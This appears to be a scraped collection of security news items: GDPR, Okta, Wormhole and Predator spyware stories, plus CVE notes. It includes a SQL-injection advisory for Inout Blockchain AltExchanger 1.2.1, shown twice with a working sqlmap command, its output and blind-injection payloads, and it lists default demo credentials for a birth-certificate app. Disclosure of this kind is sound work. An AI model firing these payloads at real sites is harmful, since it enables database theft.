Inout Blockchain AltExchanger 1.2.1 allows index.php/home/about inoutio_language cookie SQL injection.

**Information**

    Vulnerability Name  : Multiple Remote SQL Injections in Inout Blockchain AltExchanger
    Product             : Inout Blockchain AltExchanger
    version             : 1.2.1
    Date                : 2022-05-21
    Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/
    Exploit Detail      : https://github.com/bigb0x/CVEs/Blockchain-AltExchanger-121-sqli.md
    CVE-Number          : In Progess
    Exploit Author      : Mohamed N. Ali @MohamedNab1l
    

  
**Description**

Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  

**1- Vulnerable Parameter: symbol (GET)**

Vulnerability File: /application/third\_party/Chart/TradingView/chart\_content/master.php

  
**Sqlmap command:**

python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db  

**output:**

\` Parameter: symbol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO
    

\[16:43:22\] \[INFO\] testing MySQL \[16:43:23\] \[INFO\] confirming MySQL \[16:43:26\] \[INFO\] the back-end DBMS is MySQL \[16:43:26\] \[INFO\] fetching banner \[16:43:26\] \[INFO\] resumed: 5.6.50 web application technology: PHP 7.0.33 back-end DBMS: MySQL >= 5.0.0 banner: '5.6.50' \[16:43:26\] \[INFO\] fetching current database \[16:43:26\] \[INFO\] retrieved: inout\_blockchain\_altexchanger\_db current database: 'inout\_blockchain\_altexchanger\_db' \`  
  

**2- Vulnerable Parameter: marketcurrency (POST)**

Vulnerability File: /index.php/coins/update\_marketboxslider

  
**HTTP Request:**

**POST /index.php/coins/update_marketboxslider HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://vulnerable-host.com/ Cookie: inoutio_language=4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Content-Length: 69 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Host: vulnerable-host.com Connection: Keep-alive displaylimit=4&marketcurrency=-INJEQT-SQL-HERE**  
**3- Vulnerable Parameter: Cookie: inoutio\_language (GET)**

Vulnerability File: /index.php

  
**HTTP Request:**

**GET /index.php/home/about HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 x-requested-with: XMLHttpRequest Cookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Host: vulnerable-host.com Connection: Keep-alive**  
**Timeline**

    2022-05-03: Discovered the bug
    2022-05-03: Reported to vendor
    2022-05-21: Advisory published
    

  
**Discovered by**

    Mohamed N. Ali
    @MohamedNab1l
    ali.mohamed@gmail.com

CVE-2022-31489: CVEs/Blockchain-AltExchanger-121-sqli.md at main · bigb0x/CVEs

A culture of trust, combined with tools designed around employee experience, can work in tandem to help organizations become more resilient and secure.

The modern workplace is changing at a pace never seen before in history. A lot of this stemmed from COVID and remote work necessities, with 74% of CFOs noting they've adopted some kind of telecommuting policies due to coronavirus challenges. Now, more than ever, the employee experience (EX) is critical for keeping us connected and productive. That applies not just from a company growth perspective, but from a cybersecurity one.  

EX is a combination of three things: Policies, environment/culture, and tools. The key to addressing all three lies in empathy, as discussed in the book _Empathy In Action: How to Deliver Great Customer Experiences at Scale_, by Tony Bates and Dr. Natalie Petouhoff. In their book, the two position empathy as a business strategy. It’s also something that we can use to address cybersecurity.

The cybersecurity field isn’t always rewarding. It can be a relatively thankless and stressful position. COVID hasn't helped, with 70% of cybersecurity professionals reporting consistently high stress levels of cybersecurity professionals reporting consistently high stress levels. Mental health issues and even suicides are increasing among those who work in these environments. We must address the issue empathetically not just to protect systems but to save lives.

**Creating a Frictionless Office Environment Through Zero Trust  
**Zero trust is a bit misleading, because it's a technology methodology and a policy that's all about enabling EX. With zero trust in place, access is denied as the baseline. So how does that build EX? To understand, we have to compare zero trust to the traditional office network.

This is made up of company devices, software, and workers on a separate network from the Internet. Everything touching that network has been rigorously vetted to gain a "trusted" status that allows it to connect without question. Workers are expected to adhere to strict controls, confining them to certain devices, software, and practices.

This is where shadow IT rears its head. Inevitably workers end up routing around trusted devices and software to get their jobs done, creating untrustworthy networks of tools.

To respond, the industry — led by Google — came out with zero trust. Enterprises just assume everyone — software, devices, and people — are bad actors until proven otherwise. This creates a much simpler world to defend. And simpler, easier, and more streamlined experience is what EX is all about.

Zero trust is also a means of simplifying policy, which can bleed into the next point: building a blameless culture.

**Stopping Threats With a Blameless Culture**

Some 43% of employees admit to making an error at work that compromised cybersecurity. It's highly unlikely that cybersecurity professionals at those companies have corresponding reports for all those incidents. People do not like to admit when they do something wrong. They especially don't like to admit it when there are potential repercussions like job loss, demotions, or other disciplinary measures.

Meanwhile, when responding to a threat, cybersecurity professionals need clear information. They will not get this in a culture of fear. That culture of fear expands to IT and cybersecurity professionals responding to incidents, as well.

With a blameless culture, there is clear transparency of the events going on at the time of a security incident. Individuals, unafraid of repercussions, come forward with key information and increase the likelihood of resolution.

Blameless culture leads right back to EX. It does not mean a complete lack of accountability, nor does it excuse any malicious action. Zero trust is about how you create open cultures that enhance the resilience of your business. Much of that centers on the tools provided to workers.

**Empowerment Through Software Enablement**  
Software tools, especially in today’s tech-connected world, set the foundation for the employee experience. There are dozens of examples of technology improving employee productivity and happiness. The most effective, based on a Forrester study, tend to target two things:  

*   **Everyday productivity gains:** Tasks that employees have to tackle every single day are the ones where they see the most benefit when technology is deployed.

*   **Daily stress:** Barriers to their ability to do their jobs stem from technology that is outdated or difficult to understand. Technology that is easy to use eliminates this stress.

Software that meets these standards is well designed and enhances tasks. It does not create new ones. When building these tools and enterprise capabilities, it's important to take that EX into account. That should occur regardless of whether that tool is aimed at a business analyst seeking revenue guidance or cybersecurity experts on the hunt for vulnerabilities.

A culture of trust, combined with tools designed around EX, work together to help organizations become resilient. When viewed through an empathetic lens, it's easier to establish the right policies and technology to help workers be happier, healthier, and more productive.

Why the Employee Experience Is Cyber Resilience

Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.

**Project Name**

Online Birth Certificate System

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Last Updated**

09 December 2021

In Online Birth Certificate System we use PHP and MySQL Database. This project has two modules i.e. admin and user.

**Admin Module**

**1\. Home**:  In this section, admin can briefly view the total number of the new applications, total verified application and total rejected the application.

**2\. Birth Application:** In this section, admin views the application details and they have also the right to change application status according to current status.

**3\. Reports:** In this section admin can view the application details in a particular period.

**4\. Search:** In this section, admin can search application with the help of customer  application

Admin can also update his profile, change the password and recover the password.

**User Module**

**1.** **Home Page**: In this section, user can view the welcome page of the web application.

**2.Birth Reg Form**: In this section, user can fill the form of birth certificate and see the status of his/her application.

**3.Certificate:** In this section, user can take print of verified certificates.

Users can also update his profile, change the password and recover the password.

**Some Project Screenshots**

**Birth Certificate From**

**Admin Dashboard**

**Birth Certificate  
  
**

How to run the online Birth Certificate System Project

1.Download the zip file

2.Extract the file and copy obcs folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5.Create a database with name obcsdb

6.Import obcsdb.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/obcs

Admin Credential  
Username: admin  
Password: Test@123

User Credential  
Username: 9632123698  
Password: Test@12345

**View Demo** ——————————————————-

**Download full source code (Online Birth Certificate System)**

**Size: 12.1 MB**

**Version: V 1.2**

**Online Birth Certificate System Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-29005: Online Birth Certificate System Project Using PHP and MySQ -PhpGurukul

This week on Lock and Code, we speak with Whitney Merrill about why it is so difficult to get your own data from a company. 
The post Hunting down your data with Whitney Merrill: Lock and Code S03E11 appeared first on Malwarebytes Labs.

Depending on where you live, you can ask a company to hand over all the data it has collected about you and, in a matter of weeks as mandated by law, that company has to fork that information over.

Whether the company will abide on time, however, is a different story.

In the European Union, the United Kingdom, and California, consumers have a leg up in understanding what data is collected about them, largely thanks to several laws passed in those regions in the last few years. And at least in California, people can request that a company hand over the data it has collected about them, even if they are not an active user of that company’s product or a customer of that company’s services.

That’s because in today’s world, your data is not collected only by the companies you directly interact with, but also by the companies that your friends and families interact with.

In February of last year, Whitney Merrill proved this was true when she requested her data from the then-popular app Clubhouse. Though Merrill did not have an account with the company and was not a user of the app, she proved that Clubhouse did have her phone number, which had been shared with Clubhouse by Merrill’s contacts who were active users.

Merrill, who has requested her data from several more companies since then, learned more about data privacy compliance than about just what is being collected about her. Each request, Merrill said, can be different from another, and each request is done separately, forcing users who want to learn more about how their data is collected to spend increasingly more of their own time—time which they may not realistically have. The entire model right now, Merrill said, has many flaws.

> “We all interact with thousands and thousands of websites and providers that collect our data—maybe hundreds is probably a better number—in any given week or year. And, as a result, you have to go to each individual one and ask for access to your data… The burden is really on the end user.”
> 
> Whitney Merrill, Data Protection Officer and Privacy Counsel at Asana

This week on the Lock and Code podcast with host David Ruiz, we speak with Merrill about the difficulties of requesting your own data from a company and why some companies seem to interpret data privacy laws as mere suggestions. We also touch on proposed solutions to today’s problems with cross-border data transfers and what “data localization” may lead to in the future.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “God God” by Wowa (unminus.com)

Hunting down your data with Whitney Merrill: Lock and Code S03E11

Blockchain AltExchanger version 1.2.1 suffers from multiple remote SQL injection vulnerabilities.

# Information```Vulnerability Name : Multiple Remote SQL Injections in Inout Blockchain AltExchangerProduct : Inout Blockchain AltExchangerversion : 1.2.1Date : 2022-05-21Vendor Site : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/Exploit Detail : https://github.com/bigb0x/CVEs/blob/main/Blockchain-AltExchanger-121-sqli.mdCVE-Number : In ProgessExploit Author : Mohamed N. Ali @MohamedNab1l``` # Description Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure. ## 1- Vulnerable Parameter: symbol (GET) Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php ### Sqlmap command:`python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db` ### output:`Parameter: symbol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO[16:43:22] [INFO] testing MySQL[16:43:23] [INFO] confirming MySQL[16:43:26] [INFO] the back-end DBMS is MySQL[16:43:26] [INFO] fetching banner[16:43:26] [INFO] resumed: 5.6.50web application technology: PHP 7.0.33back-end DBMS: MySQL >= 5.0.0banner: '5.6.50'[16:43:26] [INFO] fetching current database[16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_dbcurrent database: 'inout_blockchain_altexchanger_db'` <img src="./resources/Blockchain-AltExchanger-121-sqli-1.png"> ## 2- Vulnerable Parameter: marketcurrency (POST) Vulnerability File: /index.php/coins/update_marketboxslider ### HTTP Request:----------------------------------------------------`POST /index.php/coins/update_marketboxslider HTTP/1.1Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://vulnerable-host.com/Cookie: inoutio_language=4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brContent-Length: 69User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36Host: vulnerable-host.comConnection: Keep-alivedisplaylimit=4&marketcurrency=-INJEQT-SQL-HERE`---------------------------------------------------- ## 3- Vulnerable Parameter: Cookie: inoutio_language (GET) Vulnerability File: /index.php ### HTTP Request:----------------------------------------------------`GET /index.php/home/about HTTP/1.1Referer: https://www.google.com/search?hl=en&q=testingUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36x-requested-with: XMLHttpRequestCookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brHost: vulnerable-host.comConnection: Keep-alive`---------------------------------------------------- ## Timeline```2022-05-03: Discovered the bug2022-05-03: Reported to vendor2022-05-21: Advisory published``` ## Discovered by```Mohamed N. Ali@MohamedNab1lali.mohamed at gmail.com```

Blockchain AltExchanger 1.2.1 SQL Injection

What subsequent protections do you have in place when your first line of defense goes down?

News that Okta was hacked by the Lapsus$ group in January has caused serious waves in the identity security space.

With the company considered a pillar of security, the confirmed hack of Okta has led many to question the wisdom of being so dependent on their identity manager. Interestingly, many are asking how to move past having a single source of truth for our access control that can also be a single source of failure.

For an industry focused on zero trust, there's a lot of faith put into a couple of security pillars. So what happens when they get knocked? Does the rest of our security infrastructure come crashing down?

**Identity at the Center of Security  
**For many organizations, Okta is the go-to for everything access security when it comes to identity.

These identity providers (IdPs) help organizations manage their identity directories, offer authentication services like single sign-on and multifactor authentication (MFA), and generally make it easier for dealing with the on- and offboarding of employees in the organization.

All great things.

The problem comes when we place way too much trust in any one solution because it can become a single point of failure.

The question becomes: What do you have in place to pick up the baton of security when the first line of defense goes down?

**Guarding the Guardians  
**Even under normal circumstances, we only see the access that we have provisioned ourselves through our IdPs or identity governance and administration (IGA) tools.

If our IdP is compromised, and therefore untrusted, then how are we validating the information that it is providing?

What we need is additional layers of security and visibility. There should be a segregation of duties between the infrastructure that manages our access and the tools that validate that access.

Our tools have to tell us not only what we think we have, but what are really facts in the field that can impact our security.

The way to achieve this is through extensive connectivity with all your organization's apps and services. It is not enough to have visibility in your AWS if your users are also utilizing GitHub, Google Docs, and many other cloud services that businesses depend on for day-to-day work.

We need to see all of the activity happening not only with our identities, but also from the asset side to see which nonfederated (local IAM/external users/service principals) are accessing our assets.

If we can understand how access privileges are being used, then we can pick up on suspicious activity and reduce our exposure with least privilege.

Credentials will be compromised and accounts taken over. Here are three ways we can limit the damage and make it harder for hackers to reach their objectives.

**1. Reduce Your Exposure  
**Avoid those self-inflicted wounds by plugging basic holes in your security. Make sure that every admin user has MFA enabled. It's not perfect, but it is a helpful barrier to make them work harder and can prevent 99.9% of the attacks.

Revoke unused privileges. If an identity has not used a privilege in 30 or 60 days, then they probably do not need it for their day-to-day work.

Perform periodic access reviews where managers and app owners have to approve or revoke access privileges for employees and others. Provide them with the sufficient data to make accurate decisions and avoid rubber stamping. Do these periodically to ensure that everyone has the right baseline level of access.

**2\. Continuously Monitor For Issues  
**Once you have a secure baseline of access privileges, you have to continuously monitor that it stays that way.

The way to do it is with policies that can be monitored and alerted on if violations occur. For example if a new admin is created or an access privilege has not been used in 30 days.

Setting enforceable guardrails will enable you to respond quickly and avoid privilege sprawl or risky exposures.

**3. Secure Your Supply Chain  
**Make sure that everyone in your supply chain or other partners are keeping to your standards.

If a mistake or failure to follow best practices on the part of your third party-vendor impacts your customers, it becomes your responsibility to inform them of your expectations and enforce them.

You can pick your metaphor, but a defense-in-depth approach requires that we not put all of our eggs in one product basket or another. Every solution has its limitations and can only play a part in the overall security array.

While authentication and IdP tools are essential first steps, they provide identity and access infrastructure. We need to ask what's happening in the infrastructure and monitor it to become more resilient and ensure that a mistake with a single vendor will not leave us exposed.

After the Okta Breach, Diversify Your Sources of Truth

Critical security flaw patched on the same day it was submitted

Critical security flaw patched on the same day it was submitted

An ethical hacker has earned a record $10 million bug bounty reward after discovering a critical security vulnerability in the Wormhole core bridge contract on Ethereum.

Wormhole is a decentralized, universal message-passing protocol that enables interoperability between blockchains such as Ethereum, Terra, and Binance Smart Chain (BSC).

**Held to ransom**

An attacker exploiting the vulnerability “could have held the entire protocol \[to\] ransom with the threat that the Ethereum Wormhole bridge would be bricked, and all the funds residing in that contract lost forever”, according to a proof of concept (PoC) posted to GitHub by Immunefi.

The PoC also noted that “$736 million worth of assets \[were\] residing in the contract at the time of submission”.

Wormhole awarded the maximum payout under its Immunefi-hosted bug bounty program to a bug hunter with the online pseudonym ‘satya0x’.

Catch up and the latest bug bounty news and analysis

The flaw, described as “an upgradeable proxy implementation self-destruct bug”, was validated and patched on February 24, the same day Satya0x reported the issue.

**Behind the bug**

The Wormhole vulnerability arose after an implementation for a Universal Upgradeable Proxy Standard (UUPS) proxy “was uninitialized after a previous bugfix had reverted the original initialization, which meant an attacker could pass their own Guardian set and proceed with the upgrade as a Guardian they controlled”, according to a blog post published by Immunefi.

RECOMMENDED US revises policy regarding Computer Fraud and Abuse Act, will not prosecute good faith research

An attacker could then force an upgrade attempt with , causing a to an attacker-submitted address, which by executing a opcode could destroy the implementation contract.

“I am proud to have played a role in mitigating a serious vulnerability and a systemic threat to the ecosystem,” said Satya0x, who praised Wormhole’s handling of “the entire bug bounty process” and Immunefi as “a knowledgeable, visible, and credibly neutral third party”.

**Blockchain bonanza**

The motive for offering such a huge reward is illustrated by the frequent, enormous losses resulting from successful hacks of Decentralized Finance (DeFi) platforms – not least the $325 million stolen from Wormhole itself earlier this year.

The payout eclipses the previous bug bounty record – a $2 million reward paid by blockchain technology company Polygon to ethical hacker Gerhard Wagner in October 2021 for a ‘double spend’ vulnerability.

Read more of the latest blockchain security news

To put the Wormhole reward into even sharper perspective, the sum is larger than the total amount paid out across all Google Vulnerability Reward Programs (VRPs) in 2021, $8.7 million.

MakerDAO, another decentralized finance (DeFi) platform, is also offering a potential maximum payout of $10 million.

RECOMMENDED UK government sits out bug bounty boom but welcomes vulnerability disclosure

Blockchain bridge Wormhole pays record $10m bug bounty reward

An update for the maven:3.5 module is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-29599: maven-shared-utils: Command injection via Commandline class


RHSA-2022:4699: Red Hat Security Advisory: maven:3.5 security update

By Deeba Ahmed
Spyware developer firm Cytrox is under Google’s radar for developing exploits against five 0-day flaws in Android and…
This is a post from HackRead.com Read the original post: Predator Spyware Using Zero-day to Target Android Devices

Spyware developer firm Cytrox is under Google’s radar for developing exploits against five 0-day flaws in Android and Chrome.

On Thursday, May 19th, Google’s Threat Analysis Group (TAG) reported that spyware developer/vendor Cytrox had developed exploits against five zero-day vulnerabilities to target Android users with spyware.

According to the details shared by TAG, threat actors are using the infamous Predator spyware in three different campaigns. Predator was previously analyzed in a report from the University of Toronto’s Citizen Lab.

**0-days used with n-days to Deploy Spyware**

The exploits are developed for four Chrome 0-days and one Android 0-day flaw. In their blog post, TAG researchers Clement Lecigne and Christian Resell explained that the 0-days are used in conjunction with n-day exploits.

Moreover, the attackers are trying to benefit from the time difference between the patching of some critical bugs, which weren’t declared severe security issues, and “when these patches were fully deployed across the Android ecosystem.”

**Spyware Details**

According to Google, the North Macedonian-based commercial surveillance firm Cytrox has packaged and sold the exploits to different state-backed threat actors in Greece, Egypt, Serbia, Madagascar, Indonesia, Spain, Côte d’Ivoire, and Armenia.

It is alleged that the buyers have used these bugs in at least three campaigns so far. The Predator spyware is similar to NSO Group’s Pegasus spyware, allowing threat actors to penetrate Android and iOS devices.

**About the Three Campaigns using Predator**

TAG examined three campaigns and concluded that attackers send one-time URLs to Android users through spear-phishing emails. These links are shortened using a common use URL shortener while the attackers target only a handful of victims. When users click on this malicious URL, they are redirected to a malicious webpage that automatically deploys the exploits and redirects them to a legitimate website.

Once there, the attackers deploy Alien Android malware that loads Cytrox’s Predator. In case the shortened link doesn’t work, the victim is directly taken to the legit website.

**List of Exploits**

Here’s the list of the 0-day flaws exploited by attackers in Chrome and Android:

*   CVE-2021-1048
*   CVE-2021-37973
*   CVE-2021-37976
*   CVE-2021-38000
*   CVE-2021-38003

The primary aim of attackers behind this operation is distributing Alien malware that is a precursor for deploying Predator spyware onto infected devices. It receives commands from Predator through an IPC (inter-process communication) mechanism and can record audio, hide apps, and add CA certificates to evade detection.

The first campaign was launched in August last year on Google Chrome, targeting the Samsung Galaxy S21 device. One month later, the second campaign targeted an updated Samsung Galaxy S10, while the third was detected in October 2021.

**More Android Spyware News**

1.  Fake Android Banking Apps Stealing Credentials Via Malware
2.  BRATA Android malware factory resets phones after stealing funds
3.  TangleBot Android malware hijacks phone to steal login credentials
4.  New Android malware TeaBot found stealing data, intercepting SMS
5.  New Russian Android Malware Tracks GPS Location and Spies on Victims

Predator Spyware Using Zero-day to Target Android Devices

The world-leading data law changed how companies work. But four years on, there’s a lag on cleaning up Big Tech.

One thousand four hundred and fifty-nine days have passed since data rights nonprofit NOYB fired off its first complaints under Europe’s flagship data regulation, GDPR. The complaints allege Google, WhatsApp, Facebook, and Instagram forced people into giving up their data without obtaining proper consent, says Romain Robert, a program director at the nonprofit. The complaints landed on May 25, 2018, the day GDPR came into force and bolstered the privacy rights of 740 million Europeans. Four years later, NOYB is still waiting for final decisions to be made. And it’s not the only one.

Since the General Data Protection Regulation went into effect, data regulators tasked with enforcing the law have struggled to act quickly on complaints against Big Tech firms and the murky online advertising industry, with scores of cases still outstanding. While GDPR has immeasurably improved the privacy rights of millions inside and outside of Europe, it hasn’t stamped out the worst problems: Data brokers are still stockpiling your information and selling it, and the online advertising industry remains littered with potential abuses.

Now, civil society groups have grown frustrated with GDPR’s limitations, while some countries’ regulators complain the system to handle international complaints is bloated and slows down enforcement. By comparison, the information economy moves at breakneck speed. “To say that GDPR is well enforced, I think it’s a mistake. It's not enforced as quickly as we thought,” Robert says. NOYB has just settled a legal case against the delays in its consent complaints. “There’s still what we call an enforcement gap and problems with cross-border enforcement and enforcement against the big players,” adds David Martin Ruiz, a senior legal officer at the European Consumer Organization, which filed a complaint about Google’s location tracking four years ago.

Lawmakers in Brussels first proposed reforming Europe’s data rules back in January 2012 and passed the final law in 2016, giving companies and organizations two years to fall in line. GDPR builds upon previous data regulations, super-charging your rights and altering how businesses must handle your personal data, information like your name or IP address. GDPR doesn’t ban the use of data in certain cases, such as police use of intrusive facial recognition; instead, seven principles sit at its heart and guide how your data can be handled, stored, and used. These principles apply equally to charities and governments, pharmaceutical companies and Big Tech firms.

Crucially, GDPR weaponized these principles and handed each European country’s data regulator the power to issue fines of up to 4 percent of a firm's global turnover and order companies to stop practices that violate GDPR's principles. (Ordering a company to stop processing people’s data is arguably more impactful than issuing fines.) It was never likely that GDPR fines and enforcement were going to flow quickly from regulators—in competition law, for instance, cases can take decades—but four years after GDPR started, the total number of major decisions against the world’s most powerful data companies remains agonizingly low.

Under the dense series of rules that make up GDPR, complaints against a company that operates in multiple EU countries are usually funneled to the country where its main European headquarters are based. This so-called one-stop-shop process dictates that the country leads the investigation. The tiny nation of Luxembourg handles complaints against Amazon; the Netherlands deals with Netflix; Sweden has Spotify; and Ireland is responsible for Meta’s Facebook, WhatsApp, and Instagram, plus all of Google’s services, Airbnb, Yahoo, Twitter, Microsoft, Apple, and LinkedIn.

A glut of early and complex GDPR complaints has led to backlogs at regulators, including the Irish body, and international cooperation has been slowed down by paperwork. Since May 2018, the Irish regulator has completed 65 percent of cases involving cross-border decisions—400 are outstanding, according to the regulator's own stats. Other cases, launched by NOYB against Netflix (Netherlands), Spotify (Sweden), and PimEyes (Poland) have all also dragged on for years.

Europe’s data regulators claim GDPR enforcement is still maturing and that it is working well and improving over time. (Officials from France, Ireland, Germany, Norway, Luxembourg, Italy, the UK, and Europe’s two independent bodies, the EDPS and EDPB, were all interviewed for this article.) The number of fines has ramped up as the legislation has aged, hitting a running total of €1.6 billion (around $1.7 billion). The biggest? Luxembourg fined Amazon €746 million ($790 million), and Ireland fined WhatsApp €225 million ($238.5 million) last year. (Both companies are appealing the decisions). At the same time, one lesser-known Belgian fine could change how the entire ad tech industry works. However, officials concede that changes to the way GDPR is enforced could speed up the process and ensure swifter action.

Helen Dixon is at the heart of Europe’s GDPR enforcement, with the Irish Data Protection Commission (DPC) responsible for an outsized number of Big Tech firms. The DPC has faced criticism for struggling to keep up with the number of complaints under its purview, drawing ire from fellow regulators and calls to reform the body. “If everything comes at you at the same time, clearly there’s going to be a lag in terms of prioritizing and dealing sequentially with the issues while standing up what is a very significant legal framework,” Dixon says, defending her office’s performance. Dixon says the DPC has had to handle GDPR’s complexity from scratch, leading to many cases and new processes, and there aren’t simple answers for many of them.

“I would classify the DPC as being very effective in the first four years of application of the GDPR,” Dixon says. “The fact that DPC has stood up a new legal framework that many described as 'the law of everything' in a couple of short years, and implemented what are very significant sanctions in the form of fines and corrective measures already in that time period” shows its success, Dixon says. The organization has enforced measures against Twitter, WhatsApp, Facebook, and Groupon, among thousands of national cases, during this time.

“There should be an independent review of how to reform and strengthen the DPC,” says Johnny Ryan, a senior fellow at the Irish Council for Civil Liberties. “We cannot know from outside what the problems are.” Ryan adds that blame can’t just be leveled at the Irish regulator. “The European Commission has immense power. The GDPR is supposed to be an immense project. And the Commission has neglected the GDPR,” he says. “It doesn't just propose the laws, it also has to see that they are applied.”

So far, the European Commission has backed enforcement of GDPR in Ireland and across the continent. “The Commission has consistently called on data protection authorities to continue stepping up their enforcement efforts,” Didier Reynders, the European Commissioner for Justice, says in a statement. “We have launched six infringement procedures under the GDPR.” These legal cases include action against Slovenia for failing to import GDPR into its national law and questioning the independence of the Belgian data authority.

However, following a complaint from Ryan in February, the EU Ombudsman, a watchdog for European institutions, opened an inquiry into how the Commission has been monitoring data protection in Ireland. (The Ombudsman says the Commission has until May 25 to reply, after asking for its initial deadline to be extended. Reynders says the Commission does not comment on ongoing inquiries). If the Commission does look into Ireland, it could make recommendations, says Estelle Massé, the global data protection lead at Access Now, a technology-focused civil rights organization. “There is an issue, and if you don't intervene in this way, I don’t really see how the situation will resolve,” Massé says. “It has to go through an infringement procedure.”

Despite clear enforcement problems, GDPR has had an incalculable effect on data practices broadly. EU countries have made decisions in thousands of local cases and issued guidance to organizations to say how they should use people’s data. Spain’s LaLiga soccer league was fined after its app spied on users, retailer H&M was fined in Germany after it saved details about employees’ personal lives, the Netherlands’ tax body was fined over its use of a ‘blacklist,’ and these are just a handful of the successful cases.

Some of GDPR’s impact is also hidden—the law isn’t just about fines and ordering companies to change—and it has improved company behaviors. “If you compare the awareness about cybersecurity, about data protection, about privacy, as it looked like 10 years ago and it looks today, these are completely different worlds,” says Wojciech Wiewiórowski, the European Data Protection Supervisor, who oversees GDPR cases against European institutions, such as Europol.

Companies have been put off using people’s data in dubious ways, experts say, when they wouldn’t have thought twice about it pre-GDPR. One recent study estimated that the number of Android apps on Google’s Play store has dropped by a third since the introduction of GDPR, citing better privacy protections. “More and more businesses have allocated significant budgets to doing data protection compliance,” says Hazel Grant, head of the privacy, security, and information group at London-headquartered law firm Fieldfisher. Grant says that when GDPR decisions are made—such as Austria’s decision to make the use of Google Analytics unlawful—companies are concerned about what it means for them. “Four or five years ago, that enforcement wouldn't have happened,” Grant says. “And if it had happened, maybe a few data protection lawyers would have known about it—it wouldn't have been out there with clients coming to us saying we need advice on this.”

